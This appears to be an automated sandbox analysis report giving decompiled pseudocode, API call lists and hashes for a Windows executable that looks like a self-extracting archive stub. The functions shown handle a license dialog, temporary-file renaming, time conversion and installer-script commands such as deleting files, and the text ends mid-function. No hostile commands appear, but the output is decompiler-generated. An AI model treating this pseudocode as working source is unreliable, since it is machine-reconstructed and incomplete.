          • Opcode Fuzzy Hash: 4b85fa523e04cbe120e5c20ceaa0ecce9f7d25a0dcfe5e86e8af7eda00b33c79
          • Instruction Fuzzy Hash: 37F1287160434C5BDB14EF248995BFE779AAFA4300F084469FF86CB287DB749848D7A2
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 78%
          			E0021E2ED(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
          				signed int _v8;
          				signed char _v15;
          				char _v16;
          				void _v24;
          				short _v28;
          				char _v31;
          				void _v32;
          				char _v36;
          				intOrPtr _v40;
          				void* _v44;
          				signed int _v48;
          				signed char* _v52;
          				long _v56;
          				int _v60;
          				signed int _t78;
          				signed int _t80;
          				int _t86;
          				void* _t94;
          				long _t97;
          				void _t105;
          				void* _t112;
          				signed int _t116;
          				signed int _t118;
          				signed char _t123;
          				signed char _t128;
          				intOrPtr _t129;
          				signed int _t131;
          				signed char* _t133;
          				intOrPtr* _t135;
          				signed int _t136;
          				void* _t137;
          
          				_t78 =  *0x22d668; // 0x4319796a
          				_v8 = _t78 ^ _t136;
          				_t80 = _a8;
          				_t118 = _t80 >> 6;
          				_t116 = (_t80 & 0x0000003f) * 0x30;
          				_t133 = _a12;
          				_v52 = _t133;
          				_v48 = _t118;
          				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x250420 + _t118 * 4)) + _t116 + 0x18));
          				_v40 = _a16 + _t133;
          				_t86 = GetConsoleCP();
          				_t135 = _a4;
          				_v60 = _t86;
          				 *_t135 = 0;
          				 *((intOrPtr*)(_t135 + 4)) = 0;
          				 *((intOrPtr*)(_t135 + 8)) = 0;
          				while(_t133 < _v40) {
          					_v28 = 0;
          					_v31 =  *_t133;
          					_t129 =  *((intOrPtr*)(0x250420 + _v48 * 4));
          					_t123 =  *(_t129 + _t116 + 0x2d);
          					if((_t123 & 0x00000004) == 0) {
          						if(( *(E00219474(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
          							_push(1);
          							_push(_t133);
          							goto L8;
          						} else {
          							if(_t133 >= _v40) {
          								_t131 = _v48;
          								 *((char*)( *((intOrPtr*)(0x250420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
          								 *( *((intOrPtr*)(0x250420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x250420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
          								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
          							} else {
          								_t112 = E0021804C( &_v28, _t133, 2);
          								_t137 = _t137 + 0xc;
          								if(_t112 != 0xffffffff) {
          									_t133 =  &(_t133[1]);
          									goto L9;
          								}
          							}
          						}
          					} else {
          						_t128 = _t123 & 0x000000fb;
          						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
          						_push(2);
          						_v15 = _t128;
          						 *(_t129 + _t116 + 0x2d) = _t128;
          						_push( &_v16);
          						L8:
          						_push( &_v28);
          						_t94 = E0021804C();
          						_t137 = _t137 + 0xc;
          						if(_t94 != 0xffffffff) {
          							L9:
          							_t133 =  &(_t133[1]);
          							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
          							_v56 = _t97;
          							if(_t97 != 0) {
          								_t45 =  &_v36; // 0x21ea62
          								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
          									L19:
          									 *_t135 = GetLastError();
          								} else {
          									_t48 = _t135 + 8; // 0xff76e900
          									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
          									if(_v36 >= _v56) {
          										if(_v31 != 0xa) {
          											goto L16;
          										} else {
          											_t105 = 0xd;
          											_v32 = _t105;
          											_t55 =  &_v36; // 0x21ea62
          											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
          												goto L19;
          											} else {
          												if(_v36 >= 1) {
          													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
          													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
          													goto L16;
          												}
          											}
          										}
          									}
          								}
          							}
          						}
          					}
          					goto L20;
          					L16:
          				}
          				L20:
          				return E0020E203(_t135, _v8 ^ _t136);
          			}


          APIs
          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0021EA62,00000000,00000000,00000000,00000000,00000000,00213FBF), ref: 0021E32F
          • __fassign.LIBCMT ref: 0021E3AA
          • __fassign.LIBCMT ref: 0021E3C5
          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0021E3EB
          • WriteFile.KERNEL32(?,00000000,00000000,b!,00000000,?,?,?,?,?,?,?,?,?,0021EA62,00000000), ref: 0021E40A
          • WriteFile.KERNEL32(?,00000000,00000001,b!,00000000,?,?,?,?,?,?,?,?,?,0021EA62,00000000), ref: 0021E443
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
          • String ID: b!
          • API String ID: 1324828854-2026699736
          • Opcode ID: 97106806c6f8c0376d8c4b8e403c6552669eef22ab8c07bc19341316004671ab
          • Instruction ID: 288654548f334c60a57273d4b291fe4e9834e88179a9e755fdca7a2efa7cca22
          • Opcode Fuzzy Hash: 97106806c6f8c0376d8c4b8e403c6552669eef22ab8c07bc19341316004671ab
          • Instruction Fuzzy Hash: 8951C770A10249AFCF10CFA8DC85EEEBBF9EF18310F15416AE965E7251D7309991CB60
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 73%
          			E0020A3E1(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
          				long _t9;
          				long _t10;
          				WCHAR* _t11;
          				void* _t25;
          				signed short _t28;
          				intOrPtr _t31;
          				struct HWND__* _t35;
          				intOrPtr _t36;
          				void* _t37;
          				struct HWND__* _t38;
          
          				_t28 = _a12;
          				_t36 = _a8;
          				_t35 = _a4;
          				if(E001F12D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
          					L16:
          					__eflags = 1;
          					return 1;
          				}
          				_t37 = _t36 - 0x110;
          				if(_t37 == 0) {
          					E0020C343(__edx, __eflags, __fp0, _t35);
          					_t9 =  *0x23b704;
          					__eflags = _t9;
          					if(_t9 != 0) {
          						SendMessageW(_t35, 0x80, 1, _t9);
          					}
          					_t10 =  *0x245d04;
          					__eflags = _t10;
          					if(_t10 != 0) {
          						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
          					}
          					_t11 =  *0x24de1c;
          					__eflags = _t11;
          					if(__eflags != 0) {
          						SetWindowTextW(_t35, _t11);
          					}
          					_t38 = GetDlgItem(_t35, 0x65);
          					SendMessageW(_t38, 0x435, 0, 0x10000);
          					SendMessageW(_t38, 0x443, 0,  *0x22df40(0xf));
          					 *0x22df3c(_t35);
          					_t31 =  *0x2375ec; // 0x0
          					E00208FE6(_t31, __eflags,  *0x230064, _t38,  *0x24de18, 0, 0);
          					L00212B4E( *0x24de1c);
          					L00212B4E( *0x24de18);
          					goto L16;
          				}
          				if(_t37 != 1) {
          					L5:
          					return 0;
          				}
          				_t25 = (_t28 & 0x0000ffff) - 1;
          				if(_t25 == 0) {
          					_push(1);
          					L7:
          					EndDialog(_t35, ??);
          					goto L16;
          				}
          				if(_t25 == 1) {
          					_push(0);
          					goto L7;
          				}
          				goto L5;
          			}














          APIs
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          • EndDialog.USER32(?,00000001), ref: 0020A431
          • SendMessageW.USER32(?,00000080,00000001,?), ref: 0020A45E
          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0020A473
          • SetWindowTextW.USER32(?,?), ref: 0020A484
          • GetDlgItem.USER32(?,00000065), ref: 0020A48D
          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0020A4A1
          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0020A4B3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: MessageSend$Item$TextWindow$Dialog
          • String ID: LICENSEDLG
          • API String ID: 3214253823-2177901306
          • Opcode ID: 3768731107244a203aa5dddf7cfacf9e7e2afea6840c9acdd08aecbe52bc5982
          • Instruction ID: dfc2a69b91a5515fddf0801bd8e20ebe4ec3e542db0706310773eecef7e9dad7
          • Opcode Fuzzy Hash: 3768731107244a203aa5dddf7cfacf9e7e2afea6840c9acdd08aecbe52bc5982
          • Instruction Fuzzy Hash: 6E21B1362243157BE3215F65FD8DF7B7B6CEB56B84F404004F601A54E2CB96A8229636
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 80%
          			E001F9268(void* __ecx) {
          				void* _t31;
          				short _t32;
          				long _t34;
          				void* _t39;
          				short _t41;
          				void* _t65;
          				intOrPtr _t68;
          				void* _t76;
          				intOrPtr _t79;
          				void* _t82;
          				WCHAR* _t83;
          				void* _t85;
          				void* _t87;
          
          				E0020D870(E00221336, _t85);
          				E0020D940();
          				_t83 =  *(_t85 + 8);
          				_t31 = _t85 - 0x4030;
          				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
          				if(_t31 == 0 || _t31 >= 0x800) {
          					L20:
          					_t32 = 0;
          					__eflags = 0;
          				} else {
          					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
          					if(_t34 == 0) {
          						goto L20;
          					} else {
          						_t92 = _t34 - 0x800;
          						if(_t34 >= 0x800) {
          							goto L20;
          						} else {
          							 *(_t85 + 8) = E001FB943(_t92, _t85 - 0x4030);
          							_t78 = E001FB943(_t92, _t85 - 0x5030);
          							_t68 = 0;
          							if( *_t38 == 0) {
          								goto L20;
          							} else {
          								_t39 = E00201410( *(_t85 + 8), _t78);
          								_t94 = _t39;
          								if(_t39 == 0) {
          									goto L20;
          								} else {
          									_t41 = E00201410(E001FB943(_t94, _t83), _t78);
          									if(_t41 != 0) {
          										goto L20;
          									} else {
          										 *(_t85 - 0x100c) = _t41;
          										_t79 = 0;
          										while(1) {
          											_t96 = _t41;
          											if(_t41 != 0) {
          												break;
          											}
          											E001FFAB1(_t85 - 0x100c, _t83, 0x800);
          											E001F3E41(E001FB943(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
          											_t87 = _t87 + 0x10;
          											if(E001F9E6B(_t85 - 0x100c) == 0) {
          												_t41 =  *(_t85 - 0x100c);
          											} else {
          												_t41 = 0;
          												 *(_t85 - 0x100c) = 0;
          											}
          											_t79 = _t79 + 0x7b;
          											if(_t79 < 0x2710) {
          												continue;
          											} else {
          												_t99 = _t41;
          												if(_t41 == 0) {
          													goto L20;
          												} else {
          													break;
          												}
          											}
          											goto L21;
          										}
          										E001FFAB1(_t85 - 0x3030, _t83, 0x800);
          										_push(0x800);
          										E001FB9B9(_t99, _t85 - 0x3030,  *(_t85 + 8));
          										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
          											goto L20;
          										} else {
          											E001F943C(_t85 - 0x2030);
          											 *((intOrPtr*)(_t85 - 4)) = _t68;
          											if(E001F9E6B(_t83) == 0) {
          												_push(0x12);
          												_push(_t83);
          												_t68 = E001F9528(_t85 - 0x2030);
          											}
          											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
          											if(_t68 != 0) {
          												E001F94DA(_t85 - 0x2030);
          												E001F9621(_t85 - 0x2030);
          											}
          											E001F946E(_t85 - 0x2030);
          											_t32 = 1;
          										}
          									}
          								}
          							}
          						}
          					}
          				}
          				L21:
          				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
          				return _t32;
          			}

















          APIs
          • __EH_prolog.LIBCMT ref: 001F926D
          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 001F9290
          • GetShortPathNameW.KERNEL32 ref: 001F92AF
            • Part of subcall function 00201410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,001FACFE,?,?,?,001FACAD,?,-00000002,?,00000000,?), ref: 00201426
          • _swprintf.LIBCMT ref: 001F934B
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
          • MoveFileW.KERNEL32(?,?), ref: 001F93C0
          • MoveFileW.KERNEL32(?,?), ref: 001F93FC
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
          • String ID: rtmp%d
          • API String ID: 2111052971-3303766350
          • Opcode ID: a28bfbecb338200ea0a272b9df200bb7284586a4f3d35385440ccff8ec1d3ae6
          • Instruction ID: f3e45b2dc3e41b9d4d3ea62b7c966f2934af0551c4d7a577e49c0ee69565d6d4
          • Opcode Fuzzy Hash: a28bfbecb338200ea0a272b9df200bb7284586a4f3d35385440ccff8ec1d3ae6
          • Instruction Fuzzy Hash: E5415BB691521CA6DF21FBA0CE44FFA637CBF65381F0444E5A704A3042EB349B85CBA4
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 89%
          			E002006E0(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
          				struct _SYSTEMTIME _v16;
          				struct _SYSTEMTIME _v32;
          				struct _SYSTEMTIME _v48;
          				struct _FILETIME _v56;
          				struct _FILETIME _v64;
          				struct _FILETIME _v72;
          				intOrPtr _v76;
          				intOrPtr _v80;
          				signed int _t73;
          				void* _t81;
          				signed int _t85;
          				void* _t86;
          				intOrPtr _t87;
          				intOrPtr* _t89;
          				intOrPtr* _t90;
          				signed int* _t92;
          				signed int _t94;
          
          				_t87 = __edx;
          				_t90 = __ecx;
          				_v80 = E0020DEE0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
          				_v76 = _t87;
          				if(E001FA995() >= 0x600) {
          					FileTimeToSystemTime( &_v64,  &_v32);
          					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
          					SystemTimeToFileTime( &_v16,  &_v72);
          					SystemTimeToFileTime( &_v32,  &_v56);
          					asm("sbb ecx, [esp+0x24]");
          					asm("sbb ecx, ebp");
          					asm("adc ecx, ebp");
          					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
          					asm("adc ecx, ebp");
          					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
          				} else {
          					FileTimeToLocalFileTime( &_v64,  &_v72);
          				}
          				FileTimeToSystemTime( &_v72,  &_v48);
          				_t92 = _a4;
          				_t81 = 1;
          				_t85 = _v48.wDay & 0x0000ffff;
          				_t94 = _v48.wMonth & 0x0000ffff;
          				_t88 = _v48.wYear & 0x0000ffff;
          				_t92[3] = _v48.wHour & 0x0000ffff;
          				_t92[4] = _v48.wMinute & 0x0000ffff;
          				_t92[5] = _v48.wSecond & 0x0000ffff;
          				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
          				 *_t92 = _v48.wYear & 0x0000ffff;
          				_t92[1] = _t94;
          				_t92[2] = _t85;
          				_t92[8] = _t85 - 1;
          				if(_t94 > 1) {
          					_t89 = 0x22d084;
          					_t86 = 4;
          					while(_t86 <= 0x30) {
          						_t86 = _t86 + 4;
          						_t92[8] = _t92[8] +  *_t89;
          						_t89 = _t89 + 4;
          						_t81 = _t81 + 1;
          						if(_t81 < _t94) {
          							continue;
          						}
          						break;
          					}
          					_t88 = _v48.wYear & 0x0000ffff;
          				}
          				if(_t94 > 2 && E00200849(_t88) != 0) {
          					_t92[8] = _t92[8] + 1;
          				}
          				_t73 = E0020DF50( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
          				_t92[6] = _t73;
          				return _t73;
          			}





















          APIs
          • __aulldiv.LIBCMT ref: 002006F3
            • Part of subcall function 001FA995: GetVersionExW.KERNEL32(?), ref: 001FA9BA
          • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0020071C
          • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0020072E
          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0020073B
          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00200751
          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0020075D
          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00200793
          • __aullrem.LIBCMT ref: 0020081D
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
          • String ID:
          • API String ID: 1247370737-0
          • Opcode ID: 6aef271e28ae6e57be94c7e9666ad359d0bfa95cfc3627b544970d59a8f192fd
          • Instruction ID: ba3b9a49bbda5524f25124e545459427c45f44ab0d0f4df6aae9f38809f932ac
          • Opcode Fuzzy Hash: 6aef271e28ae6e57be94c7e9666ad359d0bfa95cfc3627b544970d59a8f192fd
          • Instruction Fuzzy Hash: A5414EB1408305AFD310DFA5C884A6BF7F8FF88704F00492EF69692651E779E558CB51
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 52%
          			E0020BB5B(intOrPtr __ebx, void* __ecx) {
          				intOrPtr _t209;
          				void* _t210;
          				intOrPtr _t263;
          				WCHAR* _t277;
          				void* _t279;
          				WCHAR* _t280;
          				void* _t285;
          
          				L0:
          				while(1) {
          					L0:
          					_t263 = __ebx;
          					if(__ebx != 1) {
          						goto L112;
          					}
          					L96:
          					__eax = __ebp - 0x7c84;
          					__edi = 0x800;
          					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
          					E001FAEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
          					__esi = 0;
          					_push(0);
          					while(1) {
          						L98:
          						_push( *0x22d5f8);
          						__ebp - 0x7c84 = E001F3E41(0x2385fa, __edi, L"%s%s%u", __ebp - 0x7c84);
          						__eax = E001F9E6B(0x2385fa);
          						__eflags = __al;
          						if(__al == 0) {
          							break;
          						}
          						L97:
          						__esi =  &(__esi->i);
          						__eflags = __esi;
          						_push(__esi);
          					}
          					L99:
          					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x2385fa);
          					__eflags =  *(__ebp - 0x5c84);
          					if( *(__ebp - 0x5c84) == 0) {
          						while(1) {
          							L164:
          							_push(0x1000);
          							_t197 = _t285 - 0xe; // 0xffffa36e
          							_t198 = _t285 - 0xd; // 0xffffa36f
          							_t199 = _t285 - 0x5c84; // 0xffff46f8
          							_t200 = _t285 - 0xfc8c; // 0xfffea6f0
          							_push( *((intOrPtr*)(_t285 + 0xc)));
          							_t209 = E0020A156();
          							_t263 =  *((intOrPtr*)(_t285 + 0x10));
          							 *((intOrPtr*)(_t285 + 0xc)) = _t209;
          							if(_t209 != 0) {
          								_t210 = _t285 - 0x5c84;
          								_t279 = _t285 - 0x1bc8c;
          								_t277 = 6;
          								goto L2;
          							} else {
          								break;
          							}
          							L4:
          							while(E00201410(_t285 - 0xfc8c,  *((intOrPtr*)(0x22d618 + _t280 * 4))) != 0) {
          								_t280 =  &(_t280[0]);
          								if(_t280 < 0xe) {
          									continue;
          								} else {
          									goto L164;
          								}
          							}
          							__eflags = _t280 - 0xd;
          							if(__eflags > 0) {
          								continue;
          							}
          							L8:
          							switch( *((intOrPtr*)(_t280 * 4 +  &M0020C0D7))) {
          								case 0:
          									L9:
          									__eflags = _t263 - 2;
          									if(_t263 != 2) {
          										goto L164;
          									}
          									L10:
          									_t282 = 0x800;
          									E002095F8(_t285 - 0x7c84, 0x800);
          									E001FA188(E001FB625(_t285 - 0x7c84, _t285 - 0x5c84, _t285 - 0xdc8c, 0x800), _t263, _t285 - 0x8c8c, 0x800);
          									 *(_t285 - 4) = _t277;
          									E001FA2C2(_t285 - 0x8c8c, _t285 - 0xdc8c);
          									E001F6EF9(_t285 - 0x3c84);
          									_push(_t277);
          									_t271 = _t285 - 0x8c8c;
          									_t224 = E001FA215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
          									__eflags = _t224;
          									if(_t224 == 0) {
          										L26:
          										 *(_t285 - 4) =  *(_t285 - 4) | 0xffffffff;
          										E001FA19E(_t285 - 0x8c8c);
          										goto L164;
          									} else {
          										goto L13;
          										L14:
          										E001FB1B7(_t271, __eflags, _t285 - 0x7c84, _t285 - 0x103c, _t282);
          										E001FAEA5(__eflags, _t285 - 0x103c, _t282);
          										_t284 = E00212B33(_t285 - 0x7c84);
          										__eflags = _t284 - 4;
          										if(_t284 < 4) {
          											L16:
          											_t252 = E001FB5E5(_t285 - 0x5c84);
          											__eflags = _t252;
          											if(_t252 != 0) {
          												goto L26;
          											}
          											L17:
          											_t254 = E00212B33(_t285 - 0x3c84);
          											__eflags = 0;
          											 *((short*)(_t285 + _t254 * 2 - 0x3c82)) = 0;
          											E0020E920(_t277, _t285 - 0x3c, _t277, 0x1e);
          											_t287 = _t287 + 0x10;
          											 *((intOrPtr*)(_t285 - 0x38)) = 3;
          											_push(0x14);
          											_pop(_t257);
          											 *((short*)(_t285 - 0x2c)) = _t257;
          											 *((intOrPtr*)(_t285 - 0x34)) = _t285 - 0x3c84;
          											_push(_t285 - 0x3c);
          											 *0x22def4();
          											goto L18;
          										}
          										L15:
          										_t262 = E00212B33(_t285 - 0x103c);
          										__eflags = _t284 - _t262;
          										if(_t284 > _t262) {
          											goto L17;
          										}
          										goto L16;
          										L18:
          										_t229 = GetFileAttributesW(_t285 - 0x3c84);
          										__eflags = _t229 - 0xffffffff;
          										if(_t229 == 0xffffffff) {
          											L25:
          											_push(_t277);
          											_t271 = _t285 - 0x8c8c;
          											_t231 = E001FA215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
          											__eflags = _t231;
          											if(_t231 != 0) {
          												_t282 = 0x800;
          												L13:
          												SetFileAttributesW(_t285 - 0x3c84, _t277);
          												__eflags =  *((char*)(_t285 - 0x2c78));
          												if(__eflags == 0) {
          													goto L18;
          												}
          												goto L14;
          											}
          											goto L26;
          										}
          										L19:
          										_t233 = DeleteFileW(_t285 - 0x3c84);
          										__eflags = _t233;
          										if(_t233 != 0) {
          											goto L25;
          										} else {
          											_t283 = _t277;
          											_push(_t277);
          											goto L22;
          											L22:
          											E001F3E41(_t285 - 0x103c, 0x800, L"%s.%d.tmp", _t285 - 0x3c84);
          											_t287 = _t287 + 0x14;
          											_t238 = GetFileAttributesW(_t285 - 0x103c);
          											__eflags = _t238 - 0xffffffff;
          											if(_t238 != 0xffffffff) {
          												_t283 = _t283 + 1;
          												__eflags = _t283;
          												_push(_t283);
          												goto L22;
          											} else {
          												_t241 = MoveFileW(_t285 - 0x3c84, _t285 - 0x103c);
          												__eflags = _t241;
          												if(_t241 != 0) {
          													MoveFileExW(_t285 - 0x103c, _t277, 4);
          												}
          												goto L25;
          											}
          										}
          									}
          								case 1:
          									L27:
          									__eflags = __ebx;
          									if(__ebx == 0) {
          										__eax =  *0x24ce0c;
          										__eflags =  *0x24ce0c;
          										__ebx = __ebx & 0xffffff00 |  *0x24ce0c == 0x00000000;
          										__eflags = __bl;
          										if(__bl == 0) {
          											__eax =  *0x24ce0c;
          											_pop(__ecx);
          											_pop(__ecx);
          										}
          										L30:
          										__bh =  *((intOrPtr*)(__ebp - 0xd));
          										__eflags = __bh;
          										if(__eflags == 0) {
          											__eax = __ebp + 0xc;
          											_push(__ebp + 0xc);
          											__esi = E0020A2AE(__ecx, __edx, __eflags);
          											__eax =  *0x24ce0c;
          										} else {
          											__esi = __ebp - 0x5c84;
          										}
          										__eflags = __bl;
          										if(__bl == 0) {
          											__edi = __eax;
          										}
          										L35:
          										__eax = E00212B33(__esi);
          										__eax = __eax + __edi;
          										_push(__eax);
          										_push( *0x24ce0c);
          										__eax = E00212B5E(__ecx, __edx);
          										__esp = __esp + 0xc;
          										__eflags = __eax;
          										if(__eax != 0) {
          											 *0x24ce0c = __eax;
          											__eflags = __bl;
          											if(__bl != 0) {
          												__ecx = 0;
          												__eflags = 0;
          												 *__eax = __cx;
          											}
          											__eax = E002166ED(__eax, __esi);
          											_pop(__ecx);
          											_pop(__ecx);
          										}
          										__eflags = __bh;
          										if(__bh == 0) {
          											__eax = L00212B4E(__esi);
          										}
          									}
          									goto L164;
          								case 2:
          									L41:
          									__eflags = __ebx;
          									if(__ebx == 0) {
          										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
          									}
          									goto L164;
          								case 3:
          									L43:
          									__eflags = __ebx;
          									if(__ebx != 0) {
          										goto L164;
          									}
          									L44:
          									__eflags =  *0x239602 - __di;
          									if( *0x239602 != __di) {
          										goto L164;
          									}
          									L45:
          									__eax = 0;
          									__edi = __ebp - 0x5c84;
          									_push(0x22);
          									 *(__ebp - 0x103c) = __ax;
          									_pop(__eax);
          									__eflags =  *(__ebp - 0x5c84) - __ax;
          									if( *(__ebp - 0x5c84) == __ax) {
          										__edi = __ebp - 0x5c82;
          									}
          									__eax = E00212B33(__edi);
          									__esi = 0x800;
          									__eflags = __eax - 0x800;
          									if(__eax >= 0x800) {
          										goto L164;
          									} else {
          										L48:
          										__eax =  *__edi & 0x0000ffff;
          										_push(0x5c);
          										_pop(__ecx);
          										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
          										if(( *__edi & 0x0000ffff) != 0x2e) {
          											L52:
          											__eflags = __ax - __cx;
          											if(__ax == __cx) {
          												L64:
          												__ebp - 0x103c = E001FFAB1(__ebp - 0x103c, __edi, __esi);
          												__ebx = 0;
          												__eflags = 0;
          												L65:
          												_push(0x22);
          												_pop(__eax);
          												__eax = __ebp - 0x103c;
          												__eax = E00210D9B(__ebp - 0x103c, __ebp - 0x103c);
          												_pop(__ecx);
          												_pop(__ecx);
          												__eflags = __eax;
          												if(__eax != 0) {
          													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
          													if( *((intOrPtr*)(__eax + 2)) == __bx) {
          														__ecx = 0;
          														__eflags = 0;
          														 *__eax = __cx;
          													}
          												}
          												__eax = __ebp - 0x103c;
          												__edi = 0x239602;
          												E001FFAB1(0x239602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
          												__eax = E00209FFC(__ebp - 0x103c, __esi);
          												__esi = GetDlgItem( *(__ebp + 8), 0x66);
          												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
          												__ebx =  *0x22df7c;
          												__eax = SendMessageW(__esi, 0x143, __ebx, 0x239602); // executed
          												__eax = __ebp - 0x103c;
          												__eax = E00212B69(__ebp - 0x103c, 0x239602, __eax);
          												_pop(__ecx);
          												_pop(__ecx);
          												__eflags = __eax;
          												if(__eax != 0) {
          													__ebp - 0x103c = 0;
          													__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
          												}
          												goto L164;
          											}
          											L53:
          											__eflags = __ax;
          											if(__ax == 0) {
          												L55:
          												__eax = __ebp - 0x18;
          												__ebx = 0;
          												_push(__ebp - 0x18);
          												_push(1);
          												_push(0);
          												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
          												_push(0x80000002);
          												__eax =  *0x22dea8();
          												__eflags = __eax;
          												if(__eax == 0) {
          													__eax = __ebp - 0x14;
          													 *(__ebp - 0x14) = 0x1000;
